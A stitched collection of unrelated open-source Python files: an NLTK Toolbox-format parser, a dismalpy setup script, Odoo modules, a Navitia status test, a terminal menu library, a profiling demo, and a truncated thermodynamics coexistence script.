mobj = re.match(first_line_pat, line)
mkr, line_value = mobj.groups()
value_lines = [line_value,]
self.line_num = 0
for line in file_iter:
self.line_num += 1
mobj = re.match(line_pat, line)
line_mkr, line_value = mobj.groups()
if line_mkr:
yield (mkr, join_string.join(value_lines))
mkr = line_mkr
value_lines = [line_value,]
else:
value_lines.append(line_value)
self.line_num += 1
yield (mkr, join_string.join(value_lines))
def fields(self, strip=True, unwrap=True, encoding=None, errors='strict', unicode_fields=None):
"""
Return an iterator that returns the next field in a ``(marker, value)``
tuple, where ``marker`` and ``value`` are unicode strings if an ``encoding``
was specified in the ``fields()`` method. Otherwise they are non-unicode strings.
:param strip: strip trailing whitespace from the last line of each field
:type strip: bool
:param unwrap: Convert newlines in a field to spaces.
:type unwrap: bool
:param encoding: Name of an encoding to use. If it is specified then
the ``fields()`` method returns unicode strings rather than non
unicode strings.
:type encoding: str or None
:param errors: Error handling scheme for codec. Same as the ``decode()``
builtin string method.
:type errors: str
:param unicode_fields: Set of marker names whose values are UTF-8 encoded.
Ignored if encoding is None. If the whole file is UTF-8 encoded set
``encoding='utf8'`` and leave ``unicode_fields`` with its default
value of None.
:type unicode_fields: sequence
:rtype: iter(tuple(str, str))
"""
if encoding is None and unicode_fields is not None:
raise ValueError('unicode_fields is set but not encoding.')
unwrap_pat = re.compile(r'\n+')
for mkr, val in self.raw_fields():
if encoding:
if unicode_fields is not None and mkr in unicode_fields:
val = val.decode('utf8', errors)
else:
val = val.decode(encoding, errors)
mkr = mkr.decode(encoding, errors)
if unwrap:
val = unwrap_pat.sub(' ', val)
if strip:
val = val.rstrip()
yield (mkr, val)
def close(self):
"""Close a previously opened standard format marker file or string."""
self._file.close()
try:
del self.line_num
except AttributeError:
pass
class ToolboxData(StandardFormat):
def parse(self, grammar=None, **kwargs):
if grammar:
return self._chunk_parse(grammar=grammar, **kwargs)
else:
return self._record_parse(**kwargs)
def _record_parse(self, key=None, **kwargs):
"""
Returns an element tree structure corresponding to a toolbox data file with
all markers at the same level.
Thus the following Toolbox database::
\_sh v3.0 400 Rotokas Dictionary
\_DateStampHasFourDigitYear
\lx kaa
\ps V.A
\ge gag
\gp nek i pas
\lx kaa
\ps V.B
\ge strangle
\gp pasim nek
after parsing will end up with the same structure (ignoring the extra
whitespace) as the following XML fragment after being parsed by
ElementTree::
<toolbox_data>
<header>
<_sh>v3.0 400 Rotokas Dictionary</_sh>
<_DateStampHasFourDigitYear/>
</header>
<record>
<lx>kaa</lx>
<ps>V.A</ps>
<ge>gag</ge>
<gp>nek i pas</gp>
</record>
<record>
<lx>kaa</lx>
<ps>V.B</ps>
<ge>strangle</ge>
<gp>pasim nek</gp>
</record>
</toolbox_data>
:param key: Name of key marker at the start of each record. If set to
None (the default value) the first marker that doesn't begin with
an underscore is assumed to be the key.
:type key: str
:param kwargs: Keyword arguments passed to ``StandardFormat.fields()``
:type kwargs: dict
:rtype: ElementTree._ElementInterface
:return: contents of toolbox data divided into header and records
"""
builder = TreeBuilder()
builder.start('toolbox_data', {})
builder.start('header', {})
in_records = False
for mkr, value in self.fields(**kwargs):
if key is None and not in_records and mkr[0] != '_':
key = mkr
if mkr == key:
if in_records:
builder.end('record')
else:
builder.end('header')
in_records = True
builder.start('record', {})
builder.start(mkr, {})
builder.data(value)
builder.end(mkr)
if in_records:
builder.end('record')
else:
builder.end('header')
builder.end('toolbox_data')
return builder.close()
def _tree2etree(self, parent):
from nltk.tree import Tree
root = Element(parent.node)
for child in parent:
if isinstance(child, Tree):
root.append(self._tree2etree(child))
else:
text, tag = child
e = SubElement(root, tag)
e.text = text
return root
def _chunk_parse(self, grammar=None, top_node='record', trace=0, **kwargs):
"""
Returns an element tree structure corresponding to a toolbox data file
parsed according to the chunk grammar.
:type grammar: str
:param grammar: Contains the chunking rules used to parse the
database. See ``chunk.RegExp`` for documentation.
:type top_node: str
:param top_node: The node value that should be used for the
top node of the chunk structure.
:type trace: int
:param trace: The level of tracing that should be used when
parsing a text. ``0`` will generate no tracing output;
``1`` will generate normal tracing output; and ``2`` or
higher will generate verbose tracing output.
:type kwargs: dict
:param kwargs: Keyword arguments passed to ``toolbox.StandardFormat.fields()``
:rtype: ElementTree._ElementInterface
"""
from nltk import chunk
from nltk.tree import Tree
cp = chunk.RegexpParser(grammar, top_node=top_node, trace=trace)
db = self.parse(**kwargs)
tb_etree = Element('toolbox_data')
header = db.find('header')
tb_etree.append(header)
for record in db.findall('record'):
parsed = cp.parse([(elem.text, elem.tag) for elem in record])
tb_etree.append(self._tree2etree(parsed))
return tb_etree
_is_value = re.compile(r"\S")
def to_sfm_string(tree, encoding=None, errors='strict', unicode_fields=None):
"""
Return a string with a standard format representation of the toolbox
data in tree (tree can be a toolbox database or a single record).
:param tree: flat representation of toolbox data (whole database or single record)
:type tree: ElementTree._ElementInterface
:param encoding: Name of an encoding to use.
:type encoding: str
:param errors: Error handling scheme for codec. Same as the ``encode()``
builtin string method.
:type errors: str
:param unicode_fields:
:type unicode_fields: dict(str) or set(str)
:rtype: str
"""
if tree.tag == 'record':
root = Element('toolbox_data')
root.append(tree)
tree = root
if tree.tag != 'toolbox_data':
raise ValueError("not a toolbox_data element structure")
if encoding is None and unicode_fields is not None:
raise ValueError("if encoding is not specified then neither should unicode_fields")
l = []
for rec in tree:
l.append('\n')
for field in rec:
mkr = field.tag
value = field.text
if encoding is not None:
if unicode_fields is not None and mkr in unicode_fields:
cur_encoding = 'utf8'
else:
cur_encoding = encoding
if re.search(_is_value, value):
l.append((u"\\%s %s\n" % (mkr, value)).encode(cur_encoding, errors))
else:
l.append((u"\\%s%s\n" % (mkr, value)).encode(cur_encoding, errors))
else:
if re.search(_is_value, value):
l.append("\\%s %s\n" % (mkr, value))
else:
l.append("\\%s%s\n" % (mkr, value))
return ''.join(l[1:])
class ToolboxSettings(StandardFormat):
"""This class is the base class for settings files."""
def __init__(self):
super(ToolboxSettings, self).__init__()
def parse(self, encoding=None, errors='strict', **kwargs):
"""
Return the contents of toolbox settings file with a nested structure.
:param encoding: encoding used by settings file
:type encoding: str
:param errors: Error handling scheme for codec. Same as ``decode()`` builtin method.
:type errors: str
:param kwargs: Keyword arguments passed to ``StandardFormat.fields()``
:type kwargs: dict
:rtype: ElementTree._ElementInterface
"""
builder = TreeBuilder()
for mkr, value in self.fields(encoding=encoding, errors=errors, **kwargs):
# Check whether the first char of the field marker
# indicates a block start (+) or end (-)
block=mkr[0]
if block in ("+", "-"):
mkr=mkr[1:]
else:
block=None
# Build tree on the basis of block char
if block == "+":
builder.start(mkr, {})
builder.data(value)
elif block == '-':
builder.end(mkr)
else:
builder.start(mkr, {})
builder.data(value)
builder.end(mkr)
return builder.close()
def to_settings_string(tree, encoding=None, errors='strict', unicode_fields=None):
# write XML to file
l = list()
_to_settings_string(tree.getroot(), l, encoding=encoding, errors=errors, unicode_fields=unicode_fields)
return ''.join(l)
def _to_settings_string(node, l, **kwargs):
# write XML to file
tag = node.tag
text = node.text
if len(node) == 0:
if text:
l.append('\\%s %s\n' % (tag, text))
else:
l.append('\\%s\n' % tag)
else:
if text:
l.append('\\+%s %s\n' % (tag, text))
else:
l.append('\\+%s\n' % tag)
for n in node:
_to_settings_string(n, l, **kwargs)
l.append('\\-%s\n' % tag)
return
def remove_blanks(elem):
"""
Remove all elements and subelements with no text and no child elements.
:param elem: toolbox data in an elementtree structure
:type elem: ElementTree._ElementInterface
"""
out = list()
for child in elem:
remove_blanks(child)
if child.text or len(child) > 0:
out.append(child)
elem[:] = out
def add_default_fields(elem, default_fields):
"""
Add blank elements and subelements specified in default_fields.
:param elem: toolbox data in an elementtree structure
:type elem: ElementTree._ElementInterface
:param default_fields: fields to add to each type of element and subelement
:type default_fields: dict(tuple)
"""
for field in default_fields.get(elem.tag, []):
if elem.find(field) is None:
SubElement(elem, field)
for child in elem:
add_default_fields(child, default_fields)
def sort_fields(elem, field_orders):
"""
Sort the elements and subelements in order specified in field_orders.
:param elem: toolbox data in an elementtree structure
:type elem: ElementTree._ElementInterface
:param field_orders: order of fields for each type of element and subelement
:type field_orders: dict(tuple)
"""
order_dicts = dict()
for field, order in field_orders.items():
order_dicts[field] = order_key = dict()
for i, subfield in enumerate(order):
order_key[subfield] = i
_sort_fields(elem, order_dicts)
def _sort_fields(elem, orders_dicts):
"""sort the children of elem"""
try:
order = orders_dicts[elem.tag]
except KeyError:
pass
else:
tmp = [((order.get(child.tag, 1e9), i), child) for i, child in enumerate(elem)]
tmp.sort()
elem[:] = [child for key, child in tmp]
for child in elem:
if len(child):
_sort_fields(child, orders_dicts)
def add_blank_lines(tree, blanks_before, blanks_between):
"""
Add blank lines before all elements and subelements specified in blank_before.
:param elem: toolbox data in an elementtree structure
:type elem: ElementTree._ElementInterface
:param blank_before: elements and subelements to add blank lines before
:type blank_before: dict(tuple)
"""
try:
before = blanks_before[tree.tag]
between = blanks_between[tree.tag]
except KeyError:
for elem in tree:
if len(elem):
add_blank_lines(elem, blanks_before, blanks_between)
else:
last_elem = None
for elem in tree:
tag = elem.tag
if last_elem is not None and last_elem.tag != tag:
if tag in before and last_elem is not None:
e = last_elem.getiterator()[-1]
e.text = (e.text or "") + "\n"
else:
if tag in between:
e = last_elem.getiterator()[-1]
e.text = (e.text or "") + "\n"
if len(elem):
add_blank_lines(elem, blanks_before, blanks_between)
last_elem = elem
def demo():
from itertools import islice
# zip_path = find('corpora/toolbox.zip')
# lexicon = ToolboxData(ZipFilePathPointer(zip_path, 'toolbox/rotokas.dic')).parse()
file_path = find('corpora/toolbox/rotokas.dic')
lexicon = ToolboxData(file_path).parse()
print('first field in fourth record:')
print(lexicon[3][0].tag)
print(lexicon[3][0].text)
print('\nfields in sequential order:')
for field in islice(lexicon.find('record'), 10):
print(field.tag, field.text)
print('\nlx fields:')
for field in islice(lexicon.findall('record/lx'), 10):
print(field.text)
settings = ToolboxSettings()
file_path = find('corpora/toolbox/MDF/MDF_AltH.typ')
settings.open(file_path)
# settings.open(ZipFilePathPointer(zip_path, entry='toolbox/MDF/MDF_AltH.typ'))
tree = settings.parse(unwrap=False, encoding='cp1252')
print(tree.find('expset/expMDF/rtfPageSetup/paperSize').text)
settings_tree = ElementTree(tree)
print(to_settings_string(settings_tree).encode('utf8'))
if __name__ == '__main__':
demo()
|
abad623/verbalucce
|
verbalucce/nltk/toolbox.py
|
Python
|
apache-2.0
| 17,965
|
#!/usr/bin/env python
"""DismalPy: a collection of resources for quantitative economics in Python.
"""
DOCLINES = __doc__.split("\n")
import os
import sys
import subprocess
if sys.version_info[:2] < (2, 6) or (3, 0) <= sys.version_info[0:2] < (3, 2):
raise RuntimeError("Python version 2.6, 2.7 or >= 3.2 required.")
if sys.version_info[0] < 3:
import __builtin__ as builtins
else:
import builtins
CLASSIFIERS = """\
Development Status :: 4 - Beta
Intended Audience :: Science/Research
License :: OSI Approved :: BSD License
Programming Language :: Cython
Programming Language :: Python
Programming Language :: Python :: 3
Topic :: Scientific/Engineering
Operating System :: Microsoft :: Windows
Operating System :: POSIX
Operating System :: Unix
Operating System :: MacOS
"""
MAJOR = 0
MINOR = 2
MICRO = 3
ISRELEASED = True
VERSION = '%d.%d.%d' % (MAJOR, MINOR, MICRO)
# Return the git revision as a string
def git_version():
def _minimal_ext_cmd(cmd):
# construct minimal environment
env = {}
for k in ['SYSTEMROOT', 'PATH']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = subprocess.Popen(cmd, stdout = subprocess.PIPE, env=env).communicate()[0]
return out
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
GIT_REVISION = out.strip().decode('ascii')
except OSError:
GIT_REVISION = "Unknown"
return GIT_REVISION
# BEFORE importing distutils, remove MANIFEST. distutils doesn't properly
# update it when the contents of directories change.
if os.path.exists('MANIFEST'):
os.remove('MANIFEST')
def get_version_info():
# Adding the git rev number needs to be done inside
# write_version_py(), otherwise the import of dismalpy.version messes
# up the build under Python 3.
FULLVERSION = VERSION
if os.path.exists('.git'):
GIT_REVISION = git_version()
elif os.path.exists('dismalpy/version.py'):
# must be a source distribution, use existing version file
# load it as a separate module to not load dismalpy/__init__.py
import imp
version = imp.load_source('dismalpy.version', 'dismalpy/version.py')
GIT_REVISION = version.git_revision
else:
GIT_REVISION = "Unknown"
if not ISRELEASED:
FULLVERSION += '.dev-' + GIT_REVISION[:7]
return FULLVERSION, GIT_REVISION
def write_version_py(filename='dismalpy/version.py'):
cnt = """
# THIS FILE IS GENERATED FROM dismalpy SETUP.PY
short_version = '%(version)s'
version = '%(version)s'
full_version = '%(full_version)s'
git_revision = '%(git_revision)s'
release = %(isrelease)s
if not release:
version = full_version
"""
FULLVERSION, GIT_REVISION = get_version_info()
a = open(filename, 'w')
try:
a.write(cnt % {'version': VERSION,
'full_version' : FULLVERSION,
'git_revision' : GIT_REVISION,
'isrelease': str(ISRELEASED)})
finally:
a.close()
try:
from sphinx.setup_command import BuildDoc
HAVE_SPHINX = True
except:
HAVE_SPHINX = False
if HAVE_SPHINX:
class DismalpyBuildDoc(BuildDoc):
"""Run in-place build before Sphinx doc build"""
def run(self):
# Make sure dismalpy is built for autodoc features
ret = subprocess.call([sys.executable, sys.argv[0], 'build_ext', '-i'])
if ret != 0:
raise RuntimeError("Building Dismalpy failed!")
# Regenerate notebooks
cwd = os.path.abspath(os.path.dirname(__file__))
print("Re-generating notebooks")
p = subprocess.call([sys.executable,
os.path.join(cwd, 'tools', 'sphinxify_notebooks.py'),
], cwd=cwd)
if p != 0:
raise RuntimeError("Notebook generation failed!")
# Build the documentation
BuildDoc.run(self)
def generate_cython():
cwd = os.path.abspath(os.path.dirname(__file__))
print("Cythonizing sources")
p = subprocess.call([sys.executable,
os.path.join(cwd, 'tools', 'cythonize.py'),
'dismalpy'],
cwd=cwd)
if p != 0:
raise RuntimeError("Running cythonize failed!")
def configuration(parent_package='',top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration(None, parent_package, top_path)
config.set_options(ignore_setup_xxx_py=True,
assume_default_configuration=True,
delegate_options_to_subpackages=True,
quiet=True)
config.add_subpackage('dismalpy')
config.add_data_files(('dismalpy','*.txt'))
config.get_version('dismalpy/version.py')
return config
def setup_package():
# Rewrite the version file every time
write_version_py()
if HAVE_SPHINX:
cmdclass = {'build_sphinx': DismalpyBuildDoc}
else:
cmdclass = {}
# Figure out whether to add ``*_requires = ['numpy']``.
# We don't want to do that unconditionally, because we risk updating
# an installed numpy which fails too often. Just if it's not installed, we
# may give it a try. See gh-3379.
build_requires = ['statsmodels>=0.8', 'scipy>=0.14', 'Cython>=0.20','pandas>=0.16.0']
try:
import numpy
except:
build_requires = ['numpy>=1.5.1']
metadata = dict(
name = 'dismalpy',
maintainer = "Chad Fulton",
maintainer_email = "ChadFulton+pypi@gmail.com",
description = DOCLINES[0],
long_description = "\n".join(DOCLINES[2:]),
url = "http://github.com/dismalpy/dismalpy",
# download_url = "",
license = 'Simplified-BSD',
cmdclass=cmdclass,
classifiers=[_f for _f in CLASSIFIERS.split('\n') if _f],
platforms = ["Windows", "Linux", "Solaris", "Mac OS-X", "Unix"],
test_suite='nose.collector',
setup_requires = build_requires,
install_requires = build_requires,
)
if len(sys.argv) >= 2 and ('--help' in sys.argv[1:] or
sys.argv[1] in ('--help-commands', 'egg_info', '--version',
'clean')):
# For these actions, NumPy is not required.
#
# They are required to succeed without Numpy for example when
# pip is used to install dismalpy when Numpy is not yet present in
# the system.
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
FULLVERSION, GIT_REVISION = get_version_info()
metadata['version'] = FULLVERSION
else:
# if len(sys.argv) >= 2 and sys.argv[1] == 'bdist_wheel':
# # bdist_wheel needs setuptools
# import setuptools
import setuptools
from numpy.distutils.core import setup
cwd = os.path.abspath(os.path.dirname(__file__))
if not os.path.exists(os.path.join(cwd, 'PKG-INFO')):
# Generate Cython sources, unless building from source release
generate_cython()
metadata['configuration'] = configuration
setup(**metadata)
if __name__ == '__main__':
setup_package()
|
dismalpy/dismalpy
|
setup.py
|
Python
|
bsd-2-clause
| 7,553
|
# -*- coding: utf-8 -*-
# Copyright 2014 Davide Corio
# Copyright 2015-2016 Lorenzo Battistini - Agile Business Group
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
from . import wizard
from . import models
|
linkitspa/l10n-italy
|
l10n_it_fatturapa_out/__init__.py
|
Python
|
agpl-3.0
| 225
|
# Copyright (c) 2001-2014, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# channel `#navitia` on riot https://riot.im/app/#/room/#navitia:matrix.org
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from jormungandr.instance import Instance
from jormungandr.interfaces.v1 import add_common_status
from jormungandr.street_network.kraken import Kraken
from jormungandr.equipments import EquipmentProviderManager
from collections import OrderedDict
krakenBss = Kraken(instance=None, service_url=None, id="krakenBss", modes=["bss"])
krakenAll = Kraken(instance=None, service_url=None, id="krakenAll", modes=["walking", "bike", "car"])
expected_streetnetworks_status = [
{'modes': ['walking', 'bike', 'car'], 'id': 'krakenAll', 'class': 'Kraken'},
{'modes': ['bss'], 'id': 'krakenBss', 'class': 'Kraken'},
]
instant_system_ridesharing_config = [
{
"args": {
"rating_scale_min": 0,
"crowfly_radius": 500,
"network": "Network 1",
"feed_publisher": {
"url": "https://url_for_publisher",
"id": "publisher id",
"license": "Private",
"name": "Feed publisher name",
},
"service_url": "https://service_url",
"api_key": "private_key",
"rating_scale_max": 5,
},
"class": "jormungandr.scenarios.ridesharing.instant_system.InstantSystem",
}
]
expected_ridesharing_status = [
{
"circuit_breaker": {"current_state": "closed", "fail_counter": 0, "reset_timeout": 60},
"class": "InstantSystem",
"crowfly_radius": 500,
"id": "Instant System",
"network": "Network 1",
"rating_scale_max": 5,
"rating_scale_min": 0,
}
]
sytral_equipment_details_config = [
{
"class": "jormungandr.equipments.sytral.SytralProvider",
"key": "sytral",
"args": {
"url": "https://url_for_equipment_details",
"fail_max": 5,
"codes_types": ["TCL_ESCALIER", "TCL_ASCENSEUR"],
"timeout": 1,
},
}
]
expected_equipment_providers_keys = ['sytral']
expected_equipment_providers = [
{"codes_types": ["TCL_ESCALIER", "TCL_ASCENSEUR"], "fail_max": 5, "key": "sytral", "timeout": 1}
]
# The only purpose of this class is to override get_all_street_networks()
# To bypass the app.config[str('DISABLE_DATABASE')] and the get_models()
# Of the real implementation
class FakeInstance(Instance):
def __init__(
self,
disable_database,
ridesharing_configurations=None,
equipment_details_config=None,
instance_equipment_providers=None,
):
super(FakeInstance, self).__init__(
context=None,
name="instance",
zmq_socket=None,
street_network_configurations=[],
ridesharing_configurations=ridesharing_configurations,
instance_equipment_providers=[],
realtime_proxies_configuration=[],
zmq_socket_type=None,
autocomplete_type='kraken',
streetnetwork_backend_manager=None,
)
self.disable_database = disable_database
self.equipment_provider_manager = EquipmentProviderManager(equipment_details_config)
self.equipment_provider_manager.init_providers(instance_equipment_providers)
def get_models(self):
return None
def get_all_street_networks(self):
return (
self.get_all_street_networks_json() if self.disable_database else self.get_all_street_networks_db()
)
# returns a list
def get_all_street_networks_json(self):
return [krakenBss, krakenAll]
# returns a dict
def get_all_street_networks_db(self):
return {krakenBss: ["bss"], krakenAll: ["walking", "bike", "car"]}
def add_common_status_test():
# get_all_street_networks_json is called
response1 = call_add_common_status(True)
# get_all_street_networks_db is called
response2 = call_add_common_status(False)
# That's the real purpose of the test
# The responses must be the same whether we call
# get_all_street_networks_json or get_all_street_networks_db
assert response1 == response2
def call_add_common_status(disable_database):
instance = FakeInstance(
disable_database,
ridesharing_configurations=instant_system_ridesharing_config,
equipment_details_config=sytral_equipment_details_config,
instance_equipment_providers=["sytral"],
)
response = {}
response['status'] = {}
add_common_status(response, instance)
assert response['status']["is_open_data"] == False
assert response['status']["is_open_service"] == False
assert response['status']['realtime_proxies'] == []
# We sort this list because the order is not important
# And it is easier to compare
streetnetworks_status = response['status']["street_networks"]
streetnetworks_status.sort()
assert streetnetworks_status == expected_streetnetworks_status
ridesharing_status = response['status']["ridesharing_services"]
ridesharing_status.sort()
assert ridesharing_status == expected_ridesharing_status
equipment_providers_keys = response['status']["equipment_providers_services"]['equipment_providers_keys']
assert equipment_providers_keys == expected_equipment_providers_keys
equipment_providers = response['status']["equipment_providers_services"]['equipment_providers']
equipment_providers.sort()
assert equipment_providers == expected_equipment_providers
assert response['status']['autocomplete'] == {'class': 'Kraken'}
# We sort the response because the order is not important
# And it is easier to compare
return OrderedDict(response)
|
kinnou02/navitia
|
source/jormungandr/jormungandr/interfaces/v1/test/add_common_status_tests.py
|
Python
|
agpl-3.0
| 6,843
|
# no-check-code
|
mikel-egana-aranguren/SADI-Galaxy-Docker
|
galaxy-dist/eggs/mercurial-2.2.3-py2.7-linux-x86_64-ucs4.egg/mercurial/httpclient/tests/__init__.py
|
Python
|
gpl-3.0
| 16
|
'''
menu classes
'''
import subprocess, os
from . import userInput
class BaseMenu(object):
linePad = 50
def __init__(self, db, title, description):
self.db = db
self.title = title
self.description = description
def borderString(self):
columns, rows = userInput.getTerminalSize()
return ''.center(columns,'#')
def underLine(self, inStr = None, minLength = 12):
if len(inStr) < minLength:
return '='*minLength
return len(inStr) * '='
def makeTitle(self, title, description):
titleString = []
columns, rows = userInput.getTerminalSize()
titleString.append(self.borderString())
titleString.append('\n')
titleString.append(title.center(columns))
titleString.append('\n')
titleString.append('%s'%(self.underLine(inStr=title).center(columns)))
titleString.append('\n')
if not self.description in [None, ""]:
titleString.append((' %s:'%(description)).center(columns))
titleString.append('\n')
return titleString
def makeScreen(self):
screen = self.makeTitle(self.title, self.description)
screen.extend(self.makeScreenLines())
screen.append(self.borderString() + '\n')
return ''.join(screen)
class Menu(BaseMenu):
'''
Menu is the base class for all numberical selection menus
'''
def __init__(self, db, title, description, cursor):
BaseMenu.__init__(self, db, title, description)
self.cursor = cursor
self.MenuOptions = []
self.addOption(MenuOption(db = db, title = "Exit Menu", description="Exit Menu", commit = True, clear=False, action = self.exitMenu))
def exitMenu(self):
raise KeyboardInterrupt
def runMenu(self):
outVal = None
userInput.printToScreen(self.makeScreen())
while True:
varIn = userInput.inputUniversal(self.cursor).upper().strip()
if(varIn.isdigit() and int(varIn) <= len(self.MenuOptions)):
try:
if(self.MenuOptions[int(varIn) -1].clear):
userInput.printToScreen(self.makeScreen())
outVal = self.MenuOptions[int(varIn) -1].run()
if(self.MenuOptions[int(varIn) -1].commit):
self.db.commit()
break
except KeyboardInterrupt:
break
except UserWarning as uw:
print(uw)
continue
return outVal
def addOption(self, option):
self.MenuOptions.append(option)
return option
def numberedLine(self, text, count):
columns, rows = userInput.getTerminalSize()
return ("\t\t%d) %s"%(count, text)).ljust(self.linePad, ' ').center(columns).title()
def makeScreenLines(self):
return ("%s"%(self.numberedLine(self.MenuOptions[i].title, i + 1)) + '\n' for i in range(len(self.MenuOptions)))
class MenuOption(object):
def __init__(self, db = None, title = None, description = None, commit = False, clear = True, action=None):
self.db = db
self.title = title
self.description = description
self.commit = commit
self.clear = clear
self.action = action
self.typeCheck()
def typeCheck(self):
if(not type(self.commit) == bool):
raise UserWarning('commit must be a boolean')
if(not type(self.clear) == bool):
raise UserWarning('clear must be a boolean')
def run(self):
if self.action != None:
return self.action()
class ListMenu(BaseMenu):
'''
make a command controlled menu with a list
'''
def __init__(self, db, title, description, cursor, closeOnPrint = True, fields = 3, fieldLengths = [.3,.3,.4]):
BaseMenu.__init__(self, db, title, description)
self.cursor = cursor
self.commands = {
'exit':userInput.Command(func=self.exitMenu, takesArgs=False, descrip = 'Exit Inventory'),
'commands':userInput.Command(func=self.printCommands, takesArgs=False, descrip = 'Print the available commands', hide = True),
'help':userInput.Command(func=self.printCommands, takesArgs=False, descrip = 'No one can save you now', hide = True)
}
self.listItems = []
self.fields = fields
self.fieldLengths = fieldLengths
def printCommands(self):
userInput.printToScreen("Some of the Avaliable Commands:")
maxLen = max([len(command) for command in self.commands if not self.commands[command].hide])
for command in self.commands:
if not self.commands[command].hide:
userInput.printToScreen('{0}{1} -> {2.descrip}'.format(' '*(maxLen - len(command)), command, self.commands[command]))
def exitMenu(self):
raise KeyboardInterrupt
def runMenu(self):
userInput.printToScreen(self.makeScreen())
while True:
varIn = userInput.inputUniversal(self.cursor).lower().strip()
try:
arrayIn = varIn.split(' ')
command = self.commands[arrayIn[0]]
if command.takesArgs == True:
command.func(arrayIn[1:])
else:
command.func()
except KeyboardInterrupt:
break
except UserWarning as uw:
print(uw)
continue
except IndexError:
continue
except KeyError:
continue
def addListItem(self, itemArray):
if(len(itemArray) > self.fields):
raise UserWarning('item array is longer than the number of fields of this menu ({0} vs {1})'.format(len(itemArray), self.fields))
else:
self.listItems.append(itemArray)
return itemArray
def listLine(self, listItem):
formattedFields = []
columns, rows = userInput.getTerminalSize()
for field, relFieldLen in zip(listItem, self.fieldLengths):
field = str(field)
fieldLen = relFieldLen * columns
if len(field) > fieldLen:
formattedFields.append(field[:fieldLen - 3] + '...')
else:
formattedFields.append( field + ' '*int(fieldLen - len(field)) )
return " | ".join(formattedFields)
def makeScreenLines(self):
return (self.listLine(listItem) + '\n' for listItem in self.listItems)
class ObjectMenu(ListMenu):
def __init__(self, db):
ListMenu.__init__(self, db, title = "Object", description = "", cursor = " > ", closeOnPrint = True, fields = 1, fieldLengths = [1])
self.longDescrip = None
def makeTitle(self, title, description):
titleString = []
columns, rows = userInput.getTerminalSize()
titleString.append(self.borderString())
titleString.append('\n')
titleString.append(title.center(columns))
titleString.append('\n')
titleString.append('%s'%(self.underLine(inStr=title).center(columns)))
titleString.append('\n')
if not self.description in [None, ""]:
titleString.append((' %s'%(description)).center(columns))
titleString.append('\n')
titleString.append('-'*columns)
if self.longDescrip not in [None, ""]:
titleString.append(self.longDescrip.center(columns))
titleString.append('\n')
return titleString
if __name__ =="__main__":
menuEx = Menu(db = None, title = "Title", description = "Description", cursor = " >")
screen = menuEx.makeScreen()
userInput.printToScreen(screen)
|
snhobbs/DetectiveBuckPasser
|
buckPasser/menus.py
|
Python
|
unlicense
| 6,587
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import fields, models
class User(models.Model):
_inherit = ['res.users']
resume_line_ids = fields.One2many(related='employee_id.resume_line_ids', readonly=False)
employee_skill_ids = fields.One2many(related='employee_id.employee_skill_ids', readonly=False)
def __init__(self, pool, cr):
""" Override of __init__ to add access rights.
Access rights are disabled by default, but allowed
on some specific fields defined in self.SELF_{READ/WRITE}ABLE_FIELDS.
"""
hr_skills_fields = [
'resume_line_ids',
'employee_skill_ids',
]
init_res = super(User, self).__init__(pool, cr)
# duplicate list to avoid modifying the original reference
type(self).SELF_READABLE_FIELDS = type(self).SELF_READABLE_FIELDS + hr_skills_fields
type(self).SELF_WRITEABLE_FIELDS = type(self).SELF_WRITEABLE_FIELDS + hr_skills_fields
return init_res
|
t3dev/odoo
|
addons/hr_skills/models/res_users.py
|
Python
|
gpl-3.0
| 1,067
|
from time import sleep
def bar():
sleep(0.1)
def foo():
bar()
bar()
foo()
|
vpelletier/pprofile
|
demo/twocalls2.py
|
Python
|
gpl-2.0
| 80
|
import scipy as sp
from scipy.optimize import fsolve
import pylab as plt
import matplotlib
import SW
import numpy as np
###############################################################################################
# Author: Ryan Scheirer #
# Email: scheirer@oregonstate.edu #
# Date: February 2016 #
#
# Uses fsolve to find the common tangent of the free energy density vs number density... #
# ...this then constructs the temp vs filling fraction liquid-vapor coexistence plot, total...#
# ...grand free energy per volume, and many more fun plots. #
###############################################################################################
################################## START INITIALIZATION #######################################
# #
# #
### Normal temperature linspace (useful for quick troubleshooting) ###
temp = plt.linspace(0.3,0.3,1)
### non-uniform temperature linspace (used to get higher resolution near critical temperature where fsolve starts to break down) ###
#temp = np.concatenate((plt.linspace(0.3,1.0,300),plt.linspace(1.0+0.7/300,1.3,600),plt.linspace(1.3+0.3/600,1.328,1000),plt.linspace(1.328+0.028/1000,1.33,30000)),axis=0)
### Initial guesses for fsovle ###
### (NOTE: need to "play" with these initally to get fsolve to work... ###
### ...This may requires plotting your free energy per volume vs number density first to come up with some initial guesses. ###
#Lguess = 1e-9 # Initial left "n" guess (good for 0.6)
Lguess = 1e-12 # Initial left "n" guess (good for 0.3)
Rguess = 0.2 # Initial right "n" guess
# #
# #
############################### END INITIALIATION #############################################
############################### START fsolve WORK #############################################
# #
# #
###
def g(x):
### just a general function which includes conditions for finding the cotangent
x1=x[0] # left guess "n"
x2=x[1] # right guess "n"
y1=SW.ftot(T,x[0]) # f(x1)
y2=SW.ftot(T,x[1]) # f(x2)
dy1=SW.numH_dftot_dn(T,x[0]) # df_dx(x1)
dy2=SW.numH_dftot_dn(T,x[1]) # df_dx(x2)
out=[(dy1-dy2)] # Condition 1: df_dx(x1) = df_dx(x2)
out.append(dy1-((y2-y1)/(x2-x1))) # Condition 2: df_dx(x1) = slope between the two positions
return out
data=[]
count=0
for T in temp:
